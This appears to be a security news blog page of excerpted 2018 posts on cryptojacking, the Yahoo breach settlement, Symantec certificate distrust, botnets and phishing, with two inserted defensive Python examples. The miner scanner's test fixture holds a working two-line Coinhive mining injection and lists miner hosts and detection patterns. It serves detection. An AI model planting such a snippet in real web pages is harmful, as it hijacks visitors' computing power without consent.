
MY TAKE: Why ‘crypto-jacking’ is spreading faster than ransomware — and may be more insidious

By Byron V. Acohido

Has there ever been anything more tailor-made for hackers than cryptocurrency? Is anyone surprised that hackers are innovating ways to crack into digital wallets and currency exchanges?

In January, hackers absconded with some 58 billion Japanese yen worth of the XEM cryptocurrency from Tokyo-based Coincheck Exchange. That’s a cool $533 million in U.S. dollars.

Related article: Crypto miners achieve a breakthrough

Meanwhile, con artists have begun scamming unwitting victims into handing over their hard-earned digital coins. Those smiles can quickly turn to frowns if a coin holder is fooled into transacting on a spoofed website whose address looks just like the authentic URL of a popular cryptocurrency exchange, such as Binance or Bittrex.
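The lookalike-URL trick above is cheap to screen for. The following Python is an added example, not code from this article or from any exchange: it punycode-decodes a hostname, folds common confusable characters to their ASCII lookalikes, and flags anything that reads as an exchange brand without being on an allowlist of genuine apex domains. The allowlist, the confusable map, the edit-distance threshold and the sample hostnames are illustrative assumptions, not vetted data.

```python
"""Lookalike-domain screen for cryptocurrency exchange phishing (added example)."""
import unicodedata

# Genuine apex domains: a constructed allowlist for this example.
LEGIT_APEX = {"binance.com", "bittrex.com", "coincheck.com"}
BRANDS = {apex.split(".")[0] for apex in LEGIT_APEX}

# Characters attackers substitute for ASCII letters. Multi-character keys come
# first so "rn" becomes "m" before single characters are folded. Constructed and
# deliberately over-eager: a screen like this should prefer false positives.
CONFUSABLES = {
    "rn": "m", "vv": "w",
    "0": "o", "1": "l", "3": "e", "5": "s", "8": "b",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0441": "c",  # Cyrillic a e o c
    "\u0456": "i", "\u0440": "p", "\u0443": "y", "\u0445": "x",  # Cyrillic i p y x
}
EDIT_DISTANCE_THRESHOLD = 2


def normalize_label(label: str) -> str:
    """Punycode-decode, NFKC-fold, lower-case and map confusables to ASCII."""
    if label.startswith("xn--"):
        label = label.encode("ascii").decode("idna")
    label = unicodedata.normalize("NFKC", label).lower()
    for src, dst in CONFUSABLES.items():
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; catches b1nance / bimance-style typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(hostname: str):
    """Return (suspicious, reason) for a hostname.

    Assumes the registrable label is the second-to-last one, which is wrong for
    multi-part public suffixes such as co.uk; a real screen would consult the
    Public Suffix List.
    """
    raw_labels = hostname.lower().rstrip(".").split(".")
    if len(raw_labels) < 2:
        return False, "not a registrable domain"
    # Compare the raw apex, not the normalised one: a Cyrillic "binance.com"
    # must not be allowlisted just because it normalises to the genuine string.
    if ".".join(raw_labels[-2:]) in LEGIT_APEX:
        return False, "allowlisted apex domain"
    labels = [normalize_label(label) for label in raw_labels]
    registrable, subdomains = labels[-2], labels[:-2]
    for brand in sorted(BRANDS):
        if registrable == brand:
            return True, f"reads as '{brand}' but is not an allowlisted apex (confusables or wrong TLD)"
        if brand in registrable:
            return True, f"'{brand}' embedded in registrable label '{registrable}'"
        if levenshtein(registrable, brand) <= EDIT_DISTANCE_THRESHOLD:
            return True, f"'{registrable}' is within edit distance {EDIT_DISTANCE_THRESHOLD} of '{brand}'"
        if any(brand in sub for sub in subdomains):
            return True, f"'{brand}' used as a subdomain of unrelated apex '{'.'.join(labels[-2:])}'"
    return False, "no resemblance to a tracked brand"


if __name__ == "__main__":
    # Constructed samples: one genuine host, then common impersonation styles.
    for host in ("www.binance.com", "b1nance.com", "b\u0456nance.com",
                 "binance.com.account-verify.net", "bittrex-support.com"):
        print(host, assess(host))
```

Note the ordering in assess: the raw apex is checked against the allowlist before any normalisation, otherwise a Cyrillic lookalike would normalise to the genuine string and be waved through.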

However, there is an even more insidious malicious activity on the verge of disrupting business networks at an unprecedented scale: the dispersal of crypto mining malware for the purpose of crypto jacking.

New heights of innovation

Not only is this type of hacking activity taking off like a rocket, it is driving hackers to new heights of innovation. Hacking collectives are directing the latest, greatest hacking techniques to uploading crypto mining code onto PCs and servers inside business networks. They are:

•Repurposing classic botnets, as well as assigning IoT botnets to crypto mining chores.

•Using stolen NSA cyber weapons, like the ones used in the WannaCry ransomware wave, to accelerate mining activities.

•Seeking out and tapping into well-known vulnerabilities in Windows and Linux open source admin tools to aid these endeavors.


“Crypto mining malware is becoming attackers’ popular mode of operation regardless of their targets,” says Nadav Avital, security researcher at network security firm Imperva. “Crypto mining attacks are directed at any machine that has a public interface to the internet, whether it is a MySQL server, Apache server or a file server.”


MY TAKE: Why the SEC’s reporting guidance, Yahoo’s $80M payout will shake up board rooms

By Byron V. Acohido

The most encouraging thing about the U.S. Securities and Exchange Commission formally issuing cybersecurity reporting “guidance” for public companies last month was, ironically, commissioner Kara Stein’s disappointment that her colleagues did not go much further.

Related video: Howard Schmidt’s 2015 observations on board involvement

Stein said she would have liked to have seen the commission do a lot more than rehash staff-written best-practice suggestions that have been lying around since 2011. Her assertive stance resonated just a few days later when Yahoo agreed to settle a milestone securities case, for a cool $80 million.

Data thieves stole personal records for 1 billion individuals from Yahoo. So now the portal giant will pay a legal settlement that’s more than four times the $18.5 million payout Target had to cough up for losing data on 41 million customers.

Yahoo’s poor practices — neglecting to encrypt and sufficiently protect data; failing to detect and disclose the breach in a timely manner; bulling ahead with the sale to Verizon — resulted in exponentially more victims than Target.

More crucially, unlike the Target case, the Yahoo case was pressed by plaintiffs’ attorneys representing consumers in a securities-related lawsuit. (Attorneys general from 47 states sued Target.) And the private attorneys hit the jackpot. In addition to the $80 million for injured consumers, the plaintiffs’ attorneys have asked the court to order Yahoo to pay $20 million in legal fees, and up to $750,000 as reimbursement for other work expenses.

Buck stops with board

Together, the SEC’s freshly minted advice and the Yahoo settlement shine a bright light on D&O liability. It’s now crystal clear that board directors and senior executives can be held accountable for any major data breach that occurs on their watch. …

MY TAKE: Why Google is labeling websites ‘unsafe’ — what publishers need to do about it

By Byron V. Acohido

One of the things Google’s security honchos have long championed – for the most part out of the public spotlight — is making HTTPS, that is, HTTP secured by Transport Layer Security (TLS), the de facto standard for preserving the integrity and confidentiality of commercial websites.

TLS and its predecessor, Secure Sockets Layer (SSL), rely on digital certificates to validate that a website is really what it claims to be. In an environment where spoofed and booby-trapped websites have come to clutter the Internet, this is a vital function.

Related article: How the PKI ecosystem can secure IoT

TLS also uses public key cryptography, anchored in a public key infrastructure (PKI), to authenticate the server and negotiate the session keys that encrypt the data users submit to legitimate sites. Companies known as Certificate Authorities (CAs) play a pivotal role in issuing TLS certificates and assisting website owners with implementing them.

For the most part, this arrangement has worked very well, although, like anything else in security, it can be improved. On March 15, Google will take a bold step to strengthen the system: it will advance the process of ending trust in hundreds of thousands of TLS certificates issued by Symantec, the former kingpin CA. With the release of the beta and stable versions of Chrome 66, Google will begin issuing “distrust” warnings to those who visit websites using any Symantec-rooted certificate issued prior to June 1, 2016. A site owner can tell whether a certificate is affected by checking two things: whether its chain terminates in a Symantec-operated root (which also covers the GeoTrust, Thawte and RapidSSL brands Symantec owned), and whether its notBefore date falls before June 1, 2016.

Engendering trust

Starting Thursday, March 15, this could play out as a rude awakening for website publishers who haven’t been paying attention. However, the good news is that, thanks to the sudden — and remarkably smooth — handoff of Symantec’s digital certificate …

GUEST ESSAY: Surveillance cam hack shows potential for ransomware collateral damage

By David Smith

The recent charges, and subsequent arrest, of two Romanians alleged to be responsible for a widespread hack of surveillance cameras in our nation’s capital raise a number of intriguing questions.

Why hack surveillance cameras? What nefarious activity might escape law enforcement’s notice while these particular cameras went dark?

Related articles: Surveillance cams are trivial to hack

The U.S. Secret Service had every right to be alarmed by the sudden compromise of so many cameras around Washington, D.C. According to an affidavit from the case, the hackers “participated in an intrusion into and taking control of approximately 123 internet-connected computers used by the Metropolitan Police Department of the District of Columbia (“MPDC”) to operate surveillance cameras … which computers could then be used to send the ransomware-laden spam emails.”

Based on this assertion, it appears the computers controlling the cameras were the hackers’ objective, not the cameras themselves. This is an important distinction. It would seem that the Romanian hackers were not ideologues seeking to make a political point. In fact, it appears they had no interest at all in the basic functions served by the hacked cams.

It is likely that they simply found vulnerable systems, which happened to be cameras, and then swiftly infected them with ransomware. In that scenario, they hoped for a quick ransom payment by the owners of the underlying computers. And while the attackers controlled these computers, the systems could also be redirected to help spread ransomware to other systems and devices.

Material harm

Sen. Mark Warner, D-Va., hit the nail on the head when he observed: “These reports highlight just how vulnerable our systems are to fast-proliferating ransomware threats.” In this situation, the affected devices just happened to be surveillance cameras. Aside from the time and effort necessary to remove the ransomware and bring the systems back online, no other reported harm came from the cameras going dark for a period of time. …

MY TAKE: Necurs vs. Mirai – what ‘classic’ and ‘IoT’ botnets reveal about evolving cyber threats

By Byron V. Acohido

I’ve written about how botnets arose as the engine of cybercrime, and then evolved into the Swiss Army Knife of cybercrime. It dawned on me very recently that botnets have now become the bellwether of cybercrime.

This epiphany came after checking in with top experts at Proofpoint, Forcepoint, Cloudflare and Corero — leading vendors that devote significant talent and resources to monitoring and analyzing botnets. I also spoke with SlashNext, a startup that specializes in detecting stealthy botnet activity.

Related article: Russian botnets ignite social media blitz

There’s much we can discern from the distinctive ebb and flow of botnet-borne malicious activity. ‘Classic’ botnets are comprised of vast numbers of infected PCs, servers and virtual computing nodes. One of particular note is called Necurs, a massive botnet-for-hire and the king of delivering phishing email attacks, ransomware campaigns and banking Trojans.

Then there are any number of smaller, single-purpose botnets owned and operated by nation-state-backed hacking rings. The obvious example: the Russian botnet operators who orchestrated the wave of social media spoofing and propagandizing designed to influence political discourse and meddle in elections in the U.S. and across Europe. The most recent example: Russian botnets hyped the #Releasethememo campaign on Twitter to lend credence to Rep. Devin Nunes’, R-Calif., secret ‘memo’ purportedly discrediting and disqualifying the FBI from investigating Russia’s meddling in the last U.S. election. That came after Russian botnets fueled wildly conflicting polling results during the 2016 presidential race, and fabricated 6.1 million Twitter followers for then-candidate Trump.


Meanwhile, a new generation of Internet of Things botnets has arrived on the scene. IoT botnets, like Mirai and Reaper, are comprised of infected home routers, surveillance cameras and other IoT devices. Monitoring the badness emanating from the likes of Necurs, Mirai and Reaper can tell us a lot about where cyber criminals’ attention is focused – and where it might turn next. “The cyber threat landscape is constantly changing; fashions come and go,” observes Carl Leonard, principal security analyst at Forcepoint. “Cyber criminals are always seeking to increase their return on investment and they’re only going to perform an activity if it’s worthwhile for them and if they can still continue to see success over time.”

Botnets for hire

Let’s start with a basic definition and take a look at the aforementioned Necurs, a preeminent botnet in terms of delivering malicious payloads. A bot is a computing node infected with a small piece of code that causes it to obey instructions from a command-and-control server. A botnet is a network of thousands upon thousands of bots under the control of an attacker. …

NEWS WRAP-UP: Crypto miners tap hacked websites, achieve monetization breakthrough

By Byron V. Acohido

Week ending March 3, 2018. Cyber criminals have discovered a new pathway to monetization that’s as trouble-free as anything they could have dreamed up: crypto mining on the back of hacked websites. Security vendor Cyren put out results of a study this week showing a 725% spike in the number of websites hosting cryptocurrency mining software in January 2018 as compared to September 2017.

Dark Reading’s Jai Vijayan reports that much of the growth is being fueled by the insane run-up in cryptocurrency prices in recent months. For instance, the value of Monero, the most widely mined cryptocurrency at the moment, increased by 250% during the four-month period when Cyren was monitoring some 500,000 websites.

Related article: Why massive Mirai IoT botnet is so worrisome

Inserting two lines of JavaScript into a site’s pages is enough to divert a share of every visitor’s CPU to mining for the attacker; it is the visitors’ browsers, not the web server, that do the work. But to do it at a scale that matters, one would have to control a vast number of websites. It’s trivial for a motivated hacker to find and access vulnerable websites.
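The defender’s side of that two-line injection is checking your own pages for it. The Python below is an added example, not code from this article or from Cyren: it walks every script element in a page with the standard-library HTML parser and flags external scripts loaded from hosts known to serve browser miners and inline code that instantiates one. coinhive.com, coin-hive.com and authedmine.com were Coinhive’s real hostnames at the time; the rest of the host list, the inline patterns, the placeholder site key and both sample pages are constructed for illustration and would need maintaining in real use.

```python
"""Scan a page's HTML for injected browser-mining scripts (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that served browser-mining libraries; illustrative, not exhaustive.
MINER_HOSTS = {"coinhive.com", "coin-hive.com", "authedmine.com", "crypto-loot.com"}

# Inline tells. Constructor names are matched case-sensitively to limit noise.
INLINE_PATTERNS = [
    (re.compile(r"\bCoinHive\s*\.\s*(?:Anonymous|User|Token)\s*\("), "Coinhive miner constructor"),
    (re.compile(r"\bCRLT\s*\.\s*Anonymous\s*\("), "Crypto-Loot miner constructor"),
    (re.compile(r"cryptonight", re.IGNORECASE), "CryptoNight (Monero-family) hashing reference"),
]


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def scan_html(html: str):
    """Return a list of findings; an empty list means nothing matched."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        # urlparse handles absolute and protocol-relative (//host/...) URLs.
        # Relative paths have no hostname and are skipped, so a miner copied
        # onto the site's own origin is only caught if it is inline.
        host = (urlparse(src).hostname or "").lower()
        if host in MINER_HOSTS or any(host.endswith("." + h) for h in MINER_HOSTS):
            findings.append({"kind": "external_script", "evidence": src})
    for body in parser.inline:
        for pattern, label in INLINE_PATTERNS:
            if pattern.search(body):
                findings.append({"kind": "inline_script", "evidence": label})
                break
    return findings


# Constructed sample pages: a clean one, and one carrying the classic two-line
# Coinhive drop-in (the site key is a placeholder, not a real key).
CLEAN_HTML = """<html><head><title>Shop</title>
<script src="/static/app.js"></script></head>
<body><p>Welcome</p><script>window.dataLayer = [];</script></body></html>"""

COMPROMISED_HTML = """<html><head><title>Shop</title>
<script src="//coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY', {throttle: 0.3});
  miner.start();
</script>
<script src="/static/app.js"></script></head>
<body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_HTML), ("compromised", COMPROMISED_HTML)):
        print(name, scan_html(page))
```

A scan like this only catches what it is taught to look for; obfuscated or self-hosted miner code needs the behavioural signals (sustained CPU, WebAssembly workers, stratum-style WebSocket traffic) rather than string matching. A Content Security Policy whose script-src is limited to the site’s own origin and vetted CDNs would have blocked the external load above outright, but an inline snippet still slips through unless ‘unsafe-inline’ is also excluded.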


“Crypto mining represents a minuscule portion of all web-based malware,” observes Chris Olson, CEO of security consultancy The Media Trust. “It’s just another weapon employed by bad actors. It’s unlikely that any well-known brand or website would knowingly allow their digital asset to be used for cryptomining without clearly communicating it to users.

“The problem is that most websites don’t know they’ve been compromised. The continuing use of cryptomining script underscores the importance of knowing your digital partners and the code they execute in your digital environment.” …

MY TAKE: A closer look at why ‘carpet bombing’ of phishing email endures

By Byron V. Acohido

Occasionally, examining something in microcosm can be more instructive than trying to absorb a macro view that overwhelms.

Such is the case with the flurry of cyber attack reports that come out this time of year, analyzing and dissecting what transpired in the threat landscape the previous year. Last week, for instance, Fortinet and Cisco each issued their respective 2017 cyber attack retrospectives.

Related podcast: How faked personas fuel targeting attacks

Fortinet reported organizations facing the highest levels of cyberattacks in both number and sophistication, due in large part to a rise in automated swarm attacks. Exploit detections in their customers’ systems were up 82% from the previous quarter. For the full year, Fortinet found malware families growing in both volume, up 25%, and unique variants, up 19%.

Cisco, meanwhile, reported network breaches twice as severe in 2017 vs. 2016, with financial losses in cases reported by the CISOs they polled averaging $500,000 per business. Cisco’s crack researchers also broke down frightening criminal advances in “burst attack” denial of service campaigns and the weaponization of encryption.

Metrics of maliciousness

Those reports hammer home this reality: the sophistication and variety of cyber threats continues to steadily escalate in lockstep with our increasing reliance on Internet-centric commerce.

Meanwhile, for a micro view, we can look to a couple of other reports — one from the U.S. Department of Defense and the other examining how local town councils in the English countryside are doing at defending against hackers.

On any given day, both of these sectors are being carpet bombed by wave upon wave of cyber attacks. The Defense Department, for instance, detects 36 million malware-infested emails arriving from hackers, terrorists and foreign adversaries every 24 hours.

That translates into an onslaught of some 13 billion weaponized emails raining down on the Pentagon on an annual basis. We know this thanks to a talk given last month by David Bennett, director of operations for the Defense Information Systems Agency. Bennett addressed the Armed Forces Communications and Electronics Association. …